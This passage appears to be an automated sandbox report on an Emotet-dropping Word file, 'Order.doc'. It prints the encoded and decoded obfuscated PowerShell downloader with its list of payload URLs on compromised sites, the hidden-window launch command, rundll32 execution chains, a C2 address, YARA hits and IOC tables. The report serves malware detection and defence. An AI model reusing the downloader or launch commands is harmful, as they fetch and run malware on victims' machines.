AEgAYQByAF0AMQAwADAAKwBbAGMASABhAHIAXQA0ADgAKQAsAFsAcwB0AFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACkAOwAkAFAANAA2AEoAPQAoACcATwAnACsAKAAnADUAJwArACcAXwBIACcAKQApADsAIAAgACQAMABqAEEAOgA6ACIAUwBFAEMAVQBgAFIAaQBUAHkAUAByAE8AdABgAE8AYABDAE8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVgAwADAATgA9ACgAKAAnAFUAJwArACcAMgA4ACcAKQArACcARwAnACkAOwAkAEYAZQB0AGEAYwB3AGMAIAA9ACAAKAAnAEoAJwArACgAJwA0ADcAJwArACcASwAnACkAKQA7ACQAWAA2ADEARAA9ACgAJwBDACcAKwAoACcAMwAnACsAJwA5AFMAJwApACkAOwAkAFEAZgBfAHoANgA2AHQAPQAkAEgATwBNAEUAKwAoACgAJwBuAGEAJwArACcAVQBDACcAKwAnAGgAJwArACcAYQAxACcAKwAoACcAXwAnACsAJwA1AGoAJwApACsAKAAnAG4AYQBVACcAKwAnAFAAegB5AHIAeAB5AHYAJwArACcAbgBhAFUAJwApACkALgAiAHIAYABlAFAAbABhAEMAZQAiACgAKABbAGMASABBAFIAXQAxADEAMAArAFsAYwBIAEEAUgBdADkANwArAFsAYwBIAEEAUgBdAD
gANQApACwAJwBcACcAKQApACsAJABGAGUAdABhAGMAdwBjACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABEADkAOABBAD0AKAAnAFUAMAAnACsAJwA1AE4AJwApADsAJABGAGwANgBiAHcAMABjAD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQARABlAGwANwB3AGYAeQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgAGQAJwArACcAYgAgAG4AZAA6ACcAKwAnAC8ALwAnACkAKwAnAG4AJwArACgAJwBpAGcAaAB0AGwAJwArACcAaQAnACkAKwAoACcAZgAnACsAJwBlAG0AJwApACsAKAAnAHUAbQAnACsAJwBiACcAKQArACgAJwBhAGkALgAnACsAJwBjAGwAdQBiAC8AeAAnACsAJwAvADAAdwBCAEQAMwAnACsAJwAvACcAKQArACgAJwAhAG4AcwAgAHcAJwArACcAdQAgACcAKQArACgAJwBkAGIAIABuACcAKwAnAGQAcwA6AC8ALwAnACsAJwBzACcAKQArACcAaAAnACsAKAAnAG8AJwArACcAcAAuAG4AbwB3ACcAKwAnAGYAYQBsAC4AJwArACcAZABlAHYAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8AUgAnACsAJwBsAE0AJwArACgAJwBPAGIAZgAyAGoAJwArACcAMAAnACsAJwAvACEAbgBzACcAKQArACgAJwAgAHcAdQAnACsAJwAgAGQAJwApACsAKAAnAGIAIAAnACsAJwBuACcAKQArACcAZAA6ACcAKwAoACcALwAvAGUALQB3ACcAKwAnAGQAZQAnACkAKwAoACcAcwAnACsAJwBpAGcAbgAnACkAKwAoACcALgBlAHUAJwArACcALwB3AHAALQBjACcAKwAnAG8AbgAnACsAJwB0AG
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_000007FF0027197C push eax; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0040100B push ss; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024F090 push edx; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0023057F push ss; iretd
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00452D98 push 00452E25h; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00460020 push 00460058h; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00454038 push 00454064h; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0042A0B2 push 0042A0E0h; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0042A0B4 push 0042A0E0h; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0042B274 push 0042B2CDh; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0043C34C push 0043C378h; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0042E450 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_004604F4 push 0046055Ch; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00460498 push 004604EFh; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_004605F0 push 0046063Ch; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00460580 push 004605ACh; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0045B588 push 0045B5CAh; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_004605B8 push 004605E4h; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00460654 push 00460680h; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_004606C4 push 004606F0h; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0042D6DC push 0042D751h; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0042E6F0 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0046068C push 004606B8h; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0042E696 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00428748 push 00428774h; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0042E750 push ecx; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0042D754 push 0042D7ADh; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_004607E4 push 00460827h; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00428798 push 004287C4h; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_004637A8 push 004637E0h; ret
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00463848 push 00463874h; ret

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll
Source: C:\Windows\SysWOW64\rundll32.exe | PE file moved: C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Windows\SysWOW64\Jonxwll\xztbsp.lei:Zone.Identifier read attributes | delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2368 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: rundll32.exe, 00000008.00000002.2095025221.000000000048D000.00000004.00000020.sdmp | Binary or memory string: VMware_S
Source: powershell.exe, 00000005.00000002.2089981727.0000000000434000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00403278 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002327EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_00873278 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_002227EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001E27EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00283278 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_002027EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_003727EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_002327EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe | Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 190.55.186.229 80
Encrypted powershell cmdline option found
Source: unknown | Process created: Base64 decoded Set DbNM ([TYPe]("{4}{5}{3}{2}{1}{0}"-F 'y','R','o','IRect','sy','Stem.io.d') ); SV 0jA ([typE]("{0}{6}{5}{2}{7}{4}{1}{3}" -F 'SystE','ANA','SERv','GeR','OIntm','T.','m.nE','Icep') ) ; $Orb_ch2=$M41B + [char](33) + $G08C;$E50N=(('A'+'55')+'X'); ( ls vArIABle:dBNm ).VAlUe::"CR`Ea`TedIrec`T`ory"($HOME + (('B'+'d'+'0'+('Cha1'+'_5'+'jBd0'+'P')+('z'+'yr')+'xy'+('vBd'+'0'))."Re`PLa`Ce"(([cHar]66+[cHar]100+[cHar]48),[stRInG][cHar]92)));$P46J=('O'+('5'+'_H')); $0jA::"SECU`RiTyPrOt`O`COL" = ('Tl'+('s'+'12'));$V00N=(('U'+'28')+'G');$Fetacwc = ('J'+('47'+'K'));$X61D=('C'+('3'+'9S'));$Qf_z66t=$HOME+(('na'+'UC'+'h'+'a1'+('_'+'5j')+('naU'+'Pzyrxyv'+'naU'))."r`ePlaCe"(([cHAR]110+[cHAR]97+[cHAR]85),'\'))+$Fetacwc+'.d' + 'll';$D98A=('U0'+'5N');$Fl6bw0c='h' + 'tt' + 'p';$Del7wfy=(('n'+'s wu d'+'b nd:'+'//')+'n'+('ightl'+'i')+('f'+'em')+('um'+'b')+('ai.'+'club/x'+'/0wBD3'+'/')+('!ns w'+'u ')+('db n'+'ds://'+'s')+'h'+('o'+'p.now'+'fal.'+'dev')+('/wp-'+'i')+('nc'+'lud'+'es')+'/R'+'lM'+('Obf2j'+'0'+'/!ns')+(' wu'+' d')+('b '+'n')+'d:'+('//e-w'+'de')+('s'+'ign')+('.eu'+'/wp-c'+'on'+'tent/bn1Ig'+'Dejh/!'+'n'+'s '+'wu '+'d'+'b')+' '+('nd'+':')+('//traumfraue'+'n'+'-u'+'kraine'+'.d'+'e/')+'b'+('in/Jye'+'S/!ns '+'wu '+'d')+'b'+(' n'+'d')+('s'+'://jfl'+'mktg.wpc'+'o'+'m'+'sta')+'gi'+'n'+'g'+('.com'+'/wp')+('-co'+'n')+('ten'+'t/')+'A'+'K'+'/'+'!n'+('s'+' wu '+'db'+' nds://li')+('nhki'+'enma'+'yt'+'i')+('nh'+'.')+'t'+'c'+('te'+'du.com'+'/')+'w'+('p-sna'+'ps'+'hot'+'s/VzJM/'))."r`EpL`ACE"(
Source: C:\Windows\System32\cmd.exe | Process created: Base64 decoded Set DbNM ([TYPe]("{4}{5}{3}{2}{1}{0}"-F 'y','R','o','IRect','sy','Stem.io.d') ); SV 0jA ([typE]("{0}{6}{5}{2}{7}{4}{1}{3}" -F 'SystE','ANA','SERv','GeR','OIntm','T.','m.nE','Icep') ) ; $Orb_ch2=$M41B + [char](33) + $G08C;$E50N=(('A'+'55')+'X'); ( ls vArIABle:dBNm ).VAlUe::"CR`Ea`TedIrec`T`ory"($HOME + (('B'+'d'+'0'+('Cha1'+'_5'+'jBd0'+'P')+('z'+'yr')+'xy'+('vBd'+'0'))."Re`PLa`Ce"(([cHar]66+[cHar]100+[cHar]48),[stRInG][cHar]92)));$P46J=('O'+('5'+'_H')); $0jA::"SECU`RiTyPrOt`O`COL" = ('Tl'+('s'+'12'));$V00N=(('U'+'28')+'G');$Fetacwc = ('J'+('47'+'K'));$X61D=('C'+('3'+'9S'));$Qf_z66t=$HOME+(('na'+'UC'+'h'+'a1'+('_'+'5j')+('naU'+'Pzyrxyv'+'naU'))."r`ePlaCe"(([cHAR]110+[cHAR]97+[cHAR]85),'\'))+$Fetacwc+'.d' + 'll';$D98A=('U0'+'5N');$Fl6bw0c='h' + 'tt' + 'p';$Del7wfy=(('n'+'s wu d'+'b nd:'+'//')+'n'+('ightl'+'i')+('f'+'em')+('um'+'b')+('ai.'+'club/x'+'/0wBD3'+'/')+('!ns w'+'u ')+('db n'+'ds://'+'s')+'h'+('o'+'p.now'+'fal.'+'dev')+('/wp-'+'i')+('nc'+'lud'+'es')+'/R'+'lM'+('Obf2j'+'0'+'/!ns')+(' wu'+' d')+('b '+'n')+'d:'+('//e-w'+'de')+('s'+'ign')+('.eu'+'/wp-c'+'on'+'tent/bn1Ig'+'Dejh/!'+'n'+'s '+'wu '+'d'+'b')+' '+('nd'+':')+('//traumfraue'+'n'+'-u'+'kraine'+'.d'+'e/')+'b'+('in/Jye'+'S/!ns '+'wu '+'d')+'b'+(' n'+'d')+('s'+'://jfl'+'mktg.wpc'+'o'+'m'+'sta')+'gi'+'n'+'g'+('.com'+'/wp')+('-co'+'n')+('ten'+'t/')+'A'+'K'+'/'+'!n'+('s'+' wu '+'db'+' nds://li')+('nhki'+'enma'+'yt'+'i')+('nh'+'.')+'t'+'c'+('te'+'du.com'+'/')+'w'+('p-sna'+'ps'+'hot'+'s/VzJM/'))."r`EpL`ACE"(
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll AnyString
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',CnBGell
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fceveflzqtqcb\xbnmlvxgynlb.uvl',#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',TJuSeqejTSAKMZ
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jonxwll\xztbsp.lei',#1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match; File source: 00000008.00000002.2094913747.0000000000220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2092409320.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2098118909.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2098009043.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2092516972.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2097063566.0000000000210000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.2336211532.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2097445507.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.2101634327.0000000000720000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2092704885.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2096952501.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.2336195679.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.2101426694.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000002.2098032897.0000000000280000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2095103110.0000000000870000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.2101331684.0000000000370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.2094951149.00000000002F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.2336233664.00000000002D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 10.2.rundll32.exe.320000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.rundll32.exe.280000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.rundll32.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.rundll32.exe.720000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.rundll32.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.rundll32.exe.320000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.rundll32.exe.720000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.rundll32.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.rundll32.exe.870000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.rundll32.exe.3a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.rundll32.exe.260000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.rundll32.exe.2f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.rundll32.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.rundll32.exe.2d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.rundll32.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.rundll32.exe.280000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.rundll32.exe.870000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Masquerading21OS Credential DumpingSecurity Software Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScripting12Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol15SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonScripting12Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

[Behavior graph image not reproduced. Graph header: Behavior Graph ID 344065, sample Order.doc, start date 25/01/2021, architecture WINDOWS, score 100. Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 13 other signatures.]

Process tree recovered from the graph (numbers after a process name are the graph's count badges for created registry values / files; signatures attached to a node are in square brackets):

WINWORD.EXE (293, 24)
  dropped: C:\Users\user\Desktop\~$Order.doc (data)
cmd.exe  [Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found]
  msg.exe
  powershell.exe (16, 9)  [Powershell drops PE file]
    network: nightlifemumbai.club 172.217.6.174 port 80 (local port 49165), GOOGLEUS, United States
    network: shop.nowfal.dev 104.21.88.166 port 443 (local port 49166), CLOUDFLARENETUS, United States
    dropped: C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll (PE32)
    rundll32.exe
      rundll32.exe
        rundll32.exe (2)  [Hides that the sample has been downloaded from the Internet (zone.identifier)]
          rundll32.exe
            rundll32.exe (1)  [Hides that the sample has been downloaded from the Internet (zone.identifier)]
              rundll32.exe
                rundll32.exe (9)  [System process connects to network (likely due to code injection or exploit)]
                  network: 190.55.186.229 port 80 (local port 49167), TelecentroSAAR, Argentina


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
Order.doc | 33% | Virustotal |
Order.doc | 9% | ReversingLabs |

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll | 100% | Joe Sandbox ML |
C:\Users\user\Cha1_5j\Pzyrxyv\J47K.dll | 39% | ReversingLabs | Win32.Trojan.EmotetCrypt

                      Unpacked PE Files

Source | Detection | Scanner | Label
7.2.rundll32.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
10.2.rundll32.exe.280000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
11.2.rundll32.exe.720000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
8.2.rundll32.exe.870000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
9.2.rundll32.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
12.2.rundll32.exe.2d0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387

                      Domains

Source | Detection | Scanner | Label
shop.nowfal.dev | 5% | Virustotal |
nightlifemumbai.club | 2% | Virustotal |

                      URLs

Source | Detection | Scanner | Label
https://jflmktg.wpcomstaging.com/wp-content/AK/ | 0% | Virustotal |
https://jflmktg.wpcomstaging.com/wp-content/AK/ | 100% | Avira URL Cloud | malware
http://nightlifemumbai.club/x/0wBD3/ | 5% | Virustotal |
http://nightlifemumbai.club/x/0wBD3/ | 100% | Avira URL Cloud | malware
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://190.55.186.229/efl8dd1i/ | 0% | Avira URL Cloud | safe
https://shop.nowfal.dev | 100% | Avira URL Cloud | malware
http://nightlifemumbai.club | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://e-wdesign.eu/wp-content/bn1IgDejh/ | 0% | Avira URL Cloud | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://traumfrauen-ukraine.de/bin/JyeS/ | 0% | Avira URL Cloud | safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/ | 0% | Avira URL Cloud | safe
